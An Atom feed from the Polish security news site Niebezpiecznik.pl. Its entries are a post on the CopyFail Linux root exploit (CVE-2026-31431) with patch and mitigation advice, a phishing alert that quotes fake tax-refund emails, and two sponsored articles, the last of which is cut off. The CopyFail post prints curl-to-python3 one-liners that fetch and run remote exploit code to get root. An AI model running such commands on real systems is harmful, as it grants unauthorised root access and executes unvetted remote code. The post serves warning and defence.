<?xml version="1.0" encoding="UTF-8" standalone="no"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:thr="http://purl.org/syndication/thread/1.0" xml:lang="en-US">
	<title type="text">Niebezpiecznik.pl (tylko główna)</title>
	<subtitle type="text">Serwis poświęcony wyłącznie zagadnieniom bezpieczeństwa komputerowego. IT Security po polsku.</subtitle>

	<updated>2026-04-30T12:25:53Z</updated>

	<link href="https://niebezpiecznik.pl" rel="alternate" type="text/html"/>
	<id>https://niebezpiecznik.pl/feed/atom/</id>
	<link href="https://niebezpiecznik.pl/category/all/feed/atom/" rel="self" type="application/atom+xml"/>

	<generator uri="https://wordpress.org/" version="6.9.4">WordPress</generator>
	<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Nowoczesne kadry w dobie cyfrowej transformacji]]></title>
		<link href="https://niebezpiecznik.pl/post/nowoczesne-kadry-w-dobie-cyfrowej-transformacji/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27018</id>
		<updated>2026-04-30T12:25:53Z</updated>
		<published>2026-04-30T12:25:53Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/nowoczesne-kadry-w-dobie-cyfrowej-transformacji/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/zsk-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" /></a>Gwałtowny rozwój technologii, ze szczególnym uwzględnieniem sztucznej inteligencji (AI), stanowi przełom dla wielu profesji. Ale to tylko jeden z powodów głębokich transformacji zachodzących w strukturze kadr sektorów IT, telekomunikacji czy cyberbezpieczeństwa. Na tempo tych procesów rzutuje dziś także niestabilna sytuacja geopolityczna. Sektor ICT mierzy się z eskalacją liczby cyberataków oraz ich rosnącą różnorodnością. Taka dynamika [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/nowoczesne-kadry-w-dobie-cyfrowej-transformacji/"><![CDATA[<p class="p5"><span class="s1">Gwałtowny rozwój technologii, ze szczególnym uwzględnieniem sztucznej inteligencji (AI), stanowi przełom dla wielu profesji. Ale to tylko jeden z powodów głębokich transformacji zachodzących w strukturze kadr sektorów IT, telekomunikacji czy cyberbezpieczeństwa. Na tempo tych procesów rzutuje dziś także niestabilna sytuacja geopolityczna. Sektor ICT mierzy się z eskalacją liczby cyberataków oraz ich rosnącą różnorodnością. Taka dynamika wymusza na organizacjach stałe podnoszenie kompetencji obecnych pracowników oraz intensywne pozyskiwanie nowych specjalistów.  Jak z głową &#8220;przekwalifikować się&#8221; na inne stanowisko &#8212; i które konkretnie? W kogo pracodawca powinien dziś inwestować? Tego dowiecie się z poniższego artykułu.</span></p>
<p class="p5"><span id="more-27018"></span></p>
<h3 class="p6"><b>Sektorowe Ramy Kwalifikacji – „branża dla branży&#8221; </b></h3>
<p class="p7"><strong>Sektorowe Ramy Kwalifikacji</strong> (SRK IT, SRK CYBER oraz SRK TELE) to narzędzia opracowane w ramach wspierania rozwoju <strong>Zintegrowanego Systemu Kwalifikacji</strong> (ZSK), przygotowane w <a href="https://ibe.edu.pl/pl/"><span class="s2">Instytucie Badań Edukacyjnych – Państwowym Instytucie Badawczym</span></a> przez zespół ekspertów zgodnie z ideą „branża dla branży&#8221;.</p>
<p class="p7">SRK zawierają uporządkowane opisy specyficznych dla tych branż kompetencji ujętych w kategoriach: wiedza, umiejętności i kompetencje społeczne. SRK stanowią bezpośrednie rozwinięcie <strong>Polskiej Ramy Kwalifikacji</strong> (PRK) poprzez adaptowanie ogólnych standardów do specyficznych realiów rynkowych. Dzięki stopniowaniu kompetencji na poszczególnych poziomach można planować rozwój zawodowy w danym obszarze sektora.</p>
<ul class="ul1">
<li class="li7"><a href="https://kwalifikacje.edu.pl/sektorowa-rama-kwalifikacji-dla-cyberbezpieczenstwa-srk-cyber/"><span class="s2"><b>SRK CYBER</b></span></a> (2024): Nowo opublikowana rama będąca bezpośrednią odpowiedzią na zapotrzebowanie rynku w obszarze bezpieczeństwa cyfrowego.</li>
<li class="li7"><b>SRK IT</b>: Aktualizacja wersji z 2015 r. Dekadę temu sektor IT postrzegano głównie jako wsparcie biznesu, dlatego konieczna była zmiana definicji sektora, ale także uwzględnienie nowych rozwiązań technologicznych, „zielonych kompetencji&#8221; i dodanie rozbudowanego słownika zawierającego niemal 400 definicji pojęć.</li>
<li class="li5"><b>SRK TEL</b><strong>E</strong>: Aktualizacja wersji z 2015 r. z podobnymi zmianami jak w SRK IT, dodatkowo wyraźnie zaznaczono linię podziału między obszarami takimi jak infrastruktura pasywna i aktywna oraz detaliczne i hurtowe usługi telekomunikacyjne.</li>
</ul>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/zsk.jpg"><img decoding="async" class="aligncenter size-large wp-image-27019" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/zsk-600x188.jpg" alt="" width="300" height="" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/zsk-600x188.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/zsk-350x110.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/zsk-768x241.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/zsk.jpg 1178w" sizes="(max-width: 600px) 100vw, 600px" /></a></p>
<p>&nbsp;</p>
<h3 class="p8"><b>Kto najbardziej skorzysta z SRK IT, SRK CYBER i SRK TELE?</b></h3>
<p class="p7">Omawiane Sektorowe Ramy Kwalifikacji uwzględniają specyfikę poszczególnych sektorów, aktualne trendy i kierunki rozwoju, dlatego są szczególnie użyteczne dla <strong>pracodawców</strong>. Zyskują oni wsparcie w analizie luk kompetencyjnych, <strong>planowaniu ścieżek rozwoju pracowników</strong>, tworzeniu siatki płac oraz w procesach rekrutacyjnych.</p>
<p class="p9">Z kolei pracownicy dzięki SRK mogą świadomie projektować swoją karierę, samodzielnie wyznaczając cele w zakresie samokształcenia i rozwoju zawodowego.</p>
<p class="p10">SRK są również przydatne w obszarze <strong>edukacji i szkoleń</strong>. Uczelnie, szkoły i placówki oświatowe mogą dostosowywać realizowane programy nauczania do aktualnych i realnych potrzeb rynku pracy. Firmy szkoleniowe mogą skuteczniej projektować specjalistyczne szkolenia, szyte na miarę potrzeb i oczekiwań swoich klientów.</p>
<h3 class="p11"><b>Zintegrowany System Kwalifikacji </b></h3>
<p class="p9">U podstaw ZSK leży idea uczenia się przez całe życie – kompetencje można potwierdzać nie tylko poprzez edukację formalną, ale także dzięki doświadczeniu zawodowemu czy nauce własnej. Kwalifikacje uzyskane w drodze walidacji (sprawdzenia efektów uczenia się) są zintegrowane w portalu <a href="http://kwalifikacje.gov.pl"><span class="s2"><b>kwalifikacje.gov.pl</b></span></a>. W samym obszarze „<strong>Technologie cyfrowe –<span class="Apple-converted-space">  </span>IT</strong>&#8221; w Zintegrowanym Rejestrze Kwalifikacji znajdują się obecnie <strong>1462 kwalifikacje</strong>, w tym 33 wolnorynkowe, zgłoszone bezpośrednio przez firmy (np. „Modelowanie i skanowanie 3D&#8221;, „Zarządzanie cyberbezpieczeństwem&#8221;).</p>
<p class="p10">Podmioty branżowe mogą aktywnie współtworzyć ten system, zgłaszając propozycje nowych kwalifikacji, prowadząc procesy walidacji i certyfikacji czy uczestnicząc w pracach eksperckich. Warto wykorzystać te narzędzia, aby nadać swojej firmie kluczową rolę w sektorze.</p>
<h3 class="p11"><b>Więcej informacji:</b></h3>
<ul class="ul1">
<li class="li12"><span class="s4"><b>O ZSK i ZRK</b>:<a href="https://kwalifikacje.gov.pl/"><span class="s2"> https://kwalifikacje.gov.pl/</span></a></span></li>
<li class="li13"><a href="https://kwalifikacje.edu.pl/sektorowa-rama-kwalifikacji-dla-cyberbezpieczenstwa-srk-cyber/"><span class="s5">SRK CYBER</span></a><span class="s1">, zaktualizowane SRK IT i SRK TELE dostępne wkrótce na portalu ZSK</span></li>
</ul>
<p class="p9"><em>Artykuł przygotowany w ramach projektu „Wspieranie dalszego rozwoju Zintegrowanego Systemu Kwalifikacji w Polsce (ZSK6)” (FERS.01.08-IP.05-0001/23) z dofinansowaniem z Funduszy Europejskich dla Rozwoju Społecznego. Jego autorem jest <a href="https://ibe.edu.pl">Instytut Badań Edukacyjnych</a> <span class="s6">–</span> Państwowy Instytut Badawczy. Za jego publikację otrzymaliśmy wynagrodzenie.</em></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/deu.jpg"><img fetchpriority="high" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/deu-600x117.jpg" alt="" width="600" height="117" class="aligncenter size-large wp-image-27033" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/deu-600x117.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/deu-350x69.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/deu-768x150.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/deu-1536x301.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/deu.jpg 1594w" sizes="(max-width: 600px) 100vw, 600px" /></a></p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/nowoczesne-kadry-w-dobie-cyfrowej-transformacji/#comments" rel="replies" thr:count="0" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/nowoczesne-kadry-w-dobie-cyfrowej-transformacji/feed/atom/" rel="replies" thr:count="0" type="application/atom+xml"/>
			<thr:total>0</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Masz Linuksa? To go szybko załataj!]]></title>
		<link href="https://niebezpiecznik.pl/post/copyfail-linux-exploit/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27062</id>
		<updated>2026-04-30T12:23:09Z</updated>
		<published>2026-04-30T07:21:36Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="CopyFail"/><category scheme="https://niebezpiecznik.pl" term="CVE-2026-31431"/><category scheme="https://niebezpiecznik.pl" term="Linux"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/copyfail-linux-exploit/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/copyfail-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" /></a>Ujawniono atak na wszystkie Linuksy wydane po 2017 roku. W sieci pojawił się też kod exploita. Uruchomienie go na podatnej maszynie daje atakującemu prawa roota. Szczęście w nieszczęściu: ta podatność to Local a nie Remote Privilege Escalation. Mimo to, polecamy szybkie wgranie aktualizacji wszystkim, nie tylko adminom maszyn na których pracuje wielu użytkowników lub hostowane są [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/copyfail-linux-exploit/"><![CDATA[<p>Ujawniono atak na <strong>wszystkie Linuksy wydane po 2017 roku</strong>. W sieci pojawił się też kod exploita. Uruchomienie go na podatnej maszynie daje atakującemu <strong>prawa roota</strong>. Szczęście w nieszczęściu: ta podatność to <strong>Local</strong> a nie <strong>Remote</strong> Privilege Escalation. Mimo to, polecamy szybkie wgranie aktualizacji wszystkim, nie tylko adminom maszyn na których pracuje wielu użytkowników lub hostowane są kontenery.<span id="more-27062"></span></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/copyfail.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/copyfail-600x357.jpg" alt="" width="600" height="357" class="aligncenter size-large wp-image-27063" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/copyfail-600x357.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/copyfail-350x209.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/copyfail-768x458.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/copyfail.jpg 1410w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Jak sprawdzić, czy jesteś podatny?</h3>
<p>Aby zweryfikować, czy Twój system jest podatny, wystarczy uruchomić <a href="https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py" target="_blank">ten 732 bajtowy skrypt Pythona</a>. Na szybko można wykonać poniższe polecenie &#8212; po prostu skopiuj je i przeklej do terminala z poziomu zwykłego użytkownika. Jeśli po jego uruchomieniu zobaczysz <span class="code">uid=0(root)</span> i zostaniesz rootem, to jesteś podatny na atak:</p>
<p><code>curl https://copy.fail/exp | python3 && su</code></p>
<p>Skopiowałeś i przekleiłeś bez sprawdzenia co jest pod URL-em? <strong>Błąd</strong>. Nigdy tego nie rób! &#8220;Pajpowanie&#8221; kodu z internetu do shella to proszenie się o kłopoty. I nie &#8212; wejście przeglądarką na URL i sprawdzenie kodu nie wystarczy, bo złośliwa strona może serwować Twojej przeglądarce co innego niż curlowi pod tym samym adresem (tzw. User-Agent cloaking). Poprawne zachowanie to lektura wyświetlonego kodu pod kątem złośliwych instrukcji (jeśli sam nie potrafisz tego ocenić, poproś o pomoc swojego asystenta AI) a potem skopiowanie kodu do lokalnego pliku i dopiero wtedy jego uruchomienie w interpreterze Pythona.  </p>
<p>Na marginesie, jeśli chcesz nauczyć się testować swoje środowiska pod kątem różnych podatności, dziur i ataków, to wpadnij na nasze bestsellerowe, szkolenie z testów penetracyjnych pt. <a href="https://niebezpiecznik.pl/net">Bezpieczeństwa Sieci i Systemów Komputerowych</a>. Przez 3 dni hakujemy tam na różne sposoby różne maszynki, pokazujemy techniki i narzędzia, dzięki którym jesteś w stanie sprawdzić swoje środowisko pod kątem różnych ataków i w konsekwencji znacznie podnieść jego bezpieczeństwo. To szkolenie to bardziej warsztaty, bo realizujemy je w duchu minimum teorii, maksimum praktyki. Oto jego najbliższe terminy:</p>
<div class="info"><div><p><b style="color:#f00">Kraków</b>: <strong>13-15 maja 2026</strong>r. — <b style="color:#f00">UWAGA</b>: zostały <strong> tylko 3 wolne miejsca</strong><br />
                        Ostatnio ktoś zarejestrował się 10 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20gfc">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 5 maja)<br>
                        4444 PLN netto (od 6 maja)
                        </ul></div><div><p><b style="color:#f00">Wrocław</b>: <strong>17-19 czerwca 2026</strong>r. — zostało <strong>6 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 18 marca 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20gog">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 8 maja)<br>
                        4444 PLN netto (od 9 maja)
                        </ul></div><div><p><b style="color:#f00">Warszawa</b>: <strong>01-03 lipca 2026</strong>r. — zostało <strong>7 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 26 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20fty">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 8 maja)<br>
                        4444 PLN netto (od 9 maja)
                        </ul></div><div><p><b style="color:#f00"><span style="color:#FF00FF">ZDALNIE</span></b>: <strong>26-28 sierpnia 2026</strong>r. — zostało <strong>9 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 30 marca 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20g0n">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 15 maja)<br>
                        4444 PLN netto (od 16 maja)
                        </ul></div></div>
<h3>Dlaczego ten atak jest możliwy i dlaczego jest tak istotny?</h3>
<p>Luka jest wynikiem błędu logicznego w kodzie kryptograficznym jądra (uwierzytelnianie przez AF_ALG i splice()), który umożliwia niewielkie zapisy w pamięci podręcznej stron (page cache), co może naruszyć integralność binarek setuid, takich jak /usr/bin/su.</p>
<p>A teraz po polsku :) Praktycznie każdy Linuks wydany po 2017 roku jest podatny. <strong>Skutki tej dziury mogą być dramatyczne na środowiskach współdzielonych</strong>, czyli hostingach i serwerach z Kubernetes, procesami CI czy nawet w różnego rodzaju sandboxach, bo błąd może pozwolić na <strong>ucieczkę z kontenera i przejęcie systemu hosta</strong> przez użytkownika (tenanta).</p>
<p>Tą podatność / atak nazwano <span class="code">CopyFail (CVE-2026-31431)</span>. Patche są już w mainline kernela (a664bf3d603d) od 1 kwietnia. Co ciekawe, ta luka została <a href="https://xint.io/blog/copy-fail-linux-distributions" target="_blank">wykryta</a> przez skaner &#8220;dopalony&#8221; AI.</p>
<h3>Są plusy tego ataku&#8230;</h3>
<p>Jeśli masz maszynkę, do której zapomniałeś hasła roota, to teraz masz szansę je sobie nie tyle przypomnieć, co zmienić na dowolne :-) Po prostu zhackuj swojego Linuksa tym atakiem używając tego polecenia:</p>
<p><code>$ curl https://copy.fail/pw | TARGET_USER=root python3 | su</code></p>
<p>I błagamy, daj znać, że drugi raz nie zrobiłeś pajpa do pythona bez czytania tego, na co kierujesz curla.</p>
<h3>Mam Linuksa &#8212; co robić, jak żyć?</h3>
<p>Jeśli uruchomiłeś powyższy skrypt Pythona i zobaczyłeś <strong>uid=0(root)</strong> to jesteś podatny. W pierwszej kolejności zaktualizuj kernel do mainline <strong>a664bf3d603d</strong>. Jeśli nie możesz wgrać aktualizacji, to wyłącz moduł <span class="code">algif_aead</span> wykonując następujące polecenia:<br />
<code>echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf<br />
rmmod algif_aead 2>/dev/null || true</code></p>
<p>I na koniec, jeszcze raz zapraszamy wszystkich adminów do udziału w naszym szkoleniu z <a href="https://niebezpiecznik.pl/net" target="_blank">Bezpieczeństwa Sieci Komputerowych</a> &#8212; tam nie tylko nauczycie się jak hakować Linuksy na różne sposoby, ale także dowiecie się, jakie zabezpieczenia można wdrożyć, aby nawet pojawienie się takich błędów jak CopyFail nie było problemem dla Waszej maszyny (albo było problemem zdecydowanie mniejszym).</p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/copyfail-linux-exploit/#comments" rel="replies" thr:count="28" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/copyfail-linux-exploit/feed/atom/" rel="replies" thr:count="28" type="application/atom+xml"/>
			<thr:total>28</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[&#x26a0;&#xfe0f; Uwaga na fałszywe e-maile o zwrocie podatku!]]></title>
		<link href="https://niebezpiecznik.pl/post/cyberalert-zwrot-podatku-puesc-kas/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27057</id>
		<updated>2026-04-29T08:47:13Z</updated>
		<published>2026-04-29T08:47:13Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="cyberalert"/><category scheme="https://niebezpiecznik.pl" term="Krajowa Administracja Skarbowa"/><category scheme="https://niebezpiecznik.pl" term="phishing"/><category scheme="https://niebezpiecznik.pl" term="puesc"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/cyberalert-zwrot-podatku-puesc-kas/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/zwrot-podatku-cyberalert-1-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Otrzymujemy zgłoszenia dotyczące kampanii, w której przestępcy podszywając się pod pracowników Krajowej Administracji Skarbowej informują o przysługującym zwrocie podatku. Atak zaczyna się od e-maila, a kończy na stronie internetowej, gdzie ofiara, która uzupełni formularz, pieniądze straci, a nie odzyska. Wiele wariantów e-maila Poniżej podajemy przykładowe wartości dla pól nadawcy i tytułu: Od: puesc.mf.gov.pl (mail@deal.dk) Temat: WAŻNE: [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/cyberalert-zwrot-podatku-puesc-kas/"><![CDATA[<p>Otrzymujemy zgłoszenia dotyczące kampanii, w której przestępcy podszywając się pod pracowników Krajowej Administracji Skarbowej informują o przysługującym zwrocie podatku. Atak zaczyna się od e-maila, a kończy na stronie internetowej, gdzie ofiara, która uzupełni formularz, pieniądze straci, a nie odzyska.<span id="more-27057"></span></p>
<h3>Wiele wariantów e-maila</h3>
<p>Poniżej podajemy przykładowe wartości dla pól nadawcy i tytułu:</p>
<p><code>Od: puesc.mf.gov.pl (mail@deal.dk)<br />
Temat: WAŻNE: Środki czekają na Ciebie – działanie wymagane {Noreply} #644643435</p>
<p>Od: przelewy.puesc.gov.pl (noreply@jiotix.asia)<br />
Temat: PILNE: Zwrot podatku – ostatni krok {Noreply} #982617231</code></p>
<p>E-maile wyglądają bardzo profesjonalnie. Ich treść ma kilka wariantów, ale generalnie każdy z nich zachęca do kliknięcia w przycisk, aby rozpocząć procedurę zwrotu podatku, wskazując że ostateczny termin to 30 kwietnia. Mamy więc presję czasu:</p>
<blockquote><p>Potwierdzenie zwrotu nadpłaconego podatku dochodowego<br />
Szanowna Pani / Szanowny Panie,<br />
Na podstawie art. 72 § 1 Ordynacji podatkowej oraz po dokonaniu weryfikacji rocznego zeznania podatkowego PIT-37 za rok 2025, Krajowa Administracja Skarbowa stwierdza wystąpienie nadpłaty w podatku dochodowym od osób fizycznych. Kwota nadpłaty podlega zwrotowi na rachunek bankowy wskazany przez Podatnika, po uprzednim potwierdzeniu danych w systemie PUESC. Zgodnie z art. 77a ww. ustawy, zwrot nadpłaty zostanie zrealizowany w terminie 3 dni od dnia potwierdzenia rachunku. Poniżej przedstawiamy szczegóły obliczonej kwoty oraz niezbędne instrukcje.</p>
<p>Wysokość zwrotu należnego<br />
2210,25 zł słownie: dwa tysiące dwieście dziesięć złotych 25/100</p>
<p>Podstawa prawna zwrotu:<br />
&#8211; art. 75 § 1 oraz art. 77a ustawy z dnia 29 sierpnia 1997 r. Ordynacja podatkowa (t.j. Dz.U. z 2025 r. poz. 932).<br />
&#8211; rozporządzenie Ministra Finansów w sprawie zwrotu nadpłat podatkowych (Dz.U. z 2024 r. poz. 1582).</p>
<p>Zwrot pieniędzy teraz &#8212; Link prowadzi do bezpiecznego formularza w portalu PUESC. Termin potwierdzenia upływa 30 kwietnia 2026 r. UWAGA – termin zastrzeżony. Zgodnie z procedurami KAS, brak potwierdzenia danych rachunku bankowego w terminie do 30 kwietnia 2026 r. spowoduje zawieszenie wypłaty do czasu ponownej weryfikacji. Aby otrzymać środki w najbliższym terminie wypłat, prosimy o niezwłoczne działanie.</p></blockquote>
<p>Po kliknięciu w link, ofiara jest kierowana na strony pod różnymi domenami (wiele z nich nie jest wykrywanych jako złośliwe przez przeglądarki). Strony wyglądają wiarygodnie i wyłudzają dane osobowe: PESEL, nazwisko, adres, a następnie numer karty płatniczej. </p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/zwrot-podatku-cyberalert-scaled.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/zwrot-podatku-cyberalert-600x338.jpg" alt="" width="600" height="338" class="aligncenter size-large wp-image-27058" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/zwrot-podatku-cyberalert-600x338.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/zwrot-podatku-cyberalert-350x197.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/zwrot-podatku-cyberalert-768x432.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/zwrot-podatku-cyberalert-1536x864.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/zwrot-podatku-cyberalert-2048x1152.jpg 2048w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Jak jeszcze można wykryć, że to scam?</h3>
<p>Wykrycie, że ma się do czynienia z atakiem jest możliwe, jeśli stosuje się do następujących, dobrze znanych rad:</p>
<ul>
<li>Sprawdź dokładnie adres e-mail nadawcy. (tu żaden nie jest w domenie gov.pl)
<li>Nie podawaj numeru karty płatniczej, jeśli chcesz OTRZYMAĆ ZWROT pieniędzy. (podanie numeru karty, z niewielkimi wyjątkami, które można pominąć, służy do jej obciążenia)
</ul>
<h3>Otrzymałem taką wiadomość, co robić, jak żyć?</h3>
<p>Jeśli nie uzupełniłeś formularzy swoimi danymi osobowymi i nie podałeś numeru karty, możesz spać spokojnie.</p>
<p>Ze względu na skalę ataku, brak wykrywania stron jako złośliwe przez przeglądarki oraz zbliżający się termin rozliczeń podatkowych postanowiliśmy w tej kampanii wysłać ostrzeżenie użytkownikom naszej <a href="https://niebezpiecznik.pl/app" target="_blank">aplikacji CyberAlerty</a>. Aplikacja CyberAlerty jest darmowa i dostępna zarówno na Andoida jak i na iPhone. Nie wymaga rejestracji a jedyne co robi, to wysyła Ci ostrzeżenia przed atakami, jeśli zauważymy nowy, istotny i masowy atak, który może spowodować kradzież Twoich danych lub pieniędzy albo zagraża Twojej prywatności. Aplikację pobierzesz z oficjalnego sklepu <a href="https://niebezpiecznik.pl/app" target="_blank">Google</a> lub <a href="https://niebezpiecznik.pl/app" target="_blank">Apple</a>.</p>
<p><em>Dziękujemy wszystkim Czytelnikom, którzy przesłali nam informacje o tych złośliwych wiadomościach <img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f9e1.png" alt="🧡" class="wp-smiley" style="height: 1em; max-height: 1em;" /> To dzięki Wam możemy ostrzegać innych! </em></p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/cyberalert-zwrot-podatku-puesc-kas/#comments" rel="replies" thr:count="5" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/cyberalert-zwrot-podatku-puesc-kas/feed/atom/" rel="replies" thr:count="5" type="application/atom+xml"/>
			<thr:total>5</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Nadanie paczki przez InPost Mobile. Jak zrobić to wygodnie i bezpiecznie?]]></title>
		<link href="https://niebezpiecznik.pl/post/nadanie-paczki-przez-inpost-mobile-jak-zrobic-to-wygodnie-i-bezpiecznie/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27040</id>
		<updated>2026-04-28T11:06:48Z</updated>
		<published>2026-04-28T11:06:48Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="ARTYKUŁ SPONSOROWANY"/><category scheme="https://niebezpiecznik.pl" term="InPost"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/nadanie-paczki-przez-inpost-mobile-jak-zrobic-to-wygodnie-i-bezpiecznie/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Nadanie paczki może być szybkie i wygodne, ale tylko wtedy, gdy cały proces jest dobrze uporządkowany. InPost Mobile pozwala nadać przesyłkę bez drukowania etykiety i ogranicza liczbę kroków, a przy okazji pomaga zmniejszyć ryzyko błędów. Nadanie paczki zaczyna się przed uruchomieniem aplikacji Zanim użytkownik kliknie „nadaj”, musi zrobić rzecz najważniejszą: dobrze przygotować przesyłkę. InPost zaleca, [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/nadanie-paczki-przez-inpost-mobile-jak-zrobic-to-wygodnie-i-bezpiecznie/"><![CDATA[<p>Nadanie paczki może być szybkie i wygodne, ale tylko wtedy, gdy cały proces jest dobrze uporządkowany. InPost Mobile pozwala nadać przesyłkę bez drukowania etykiety i ogranicza liczbę kroków, a przy okazji pomaga zmniejszyć ryzyko błędów.<span id="more-27040"></span></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy-600x335.jpg" alt="" width="600" height="335" class="aligncenter size-large wp-image-27043" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy-600x335.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy-350x196.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy-768x429.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/Nadanie-paczki-przez-InPost-Mobile-Jak-zrobi-to-wy.jpg 1320w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Nadanie paczki zaczyna się przed uruchomieniem aplikacji</h3>
<p class="p3">Zanim użytkownik kliknie „nadaj”, musi zrobić rzecz najważniejszą: dobrze przygotować przesyłkę. InPost zaleca, by <b>opakowanie było dopasowane do zawartości, odpowiednio wytrzymałe i wypełnione</b> tak, aby rzeczy nie przemieszczały się w środku. Bezpieczne nadanie paczki zaczyna się od pudełka, nie od ekranu telefonu.</p>
<p class="p3">To ważny aspekt, który często bywa lekceważony. Niesłusznie. Źle zabezpieczona paczka może zamienić prostą wysyłkę w reklamację, a pośpiech przy pakowaniu zwykle mści się właśnie wtedy, gdy przesyłka trafia do obiegu.</p>
<h3>InPost Mobile upraszcza nadanie paczki</h3>
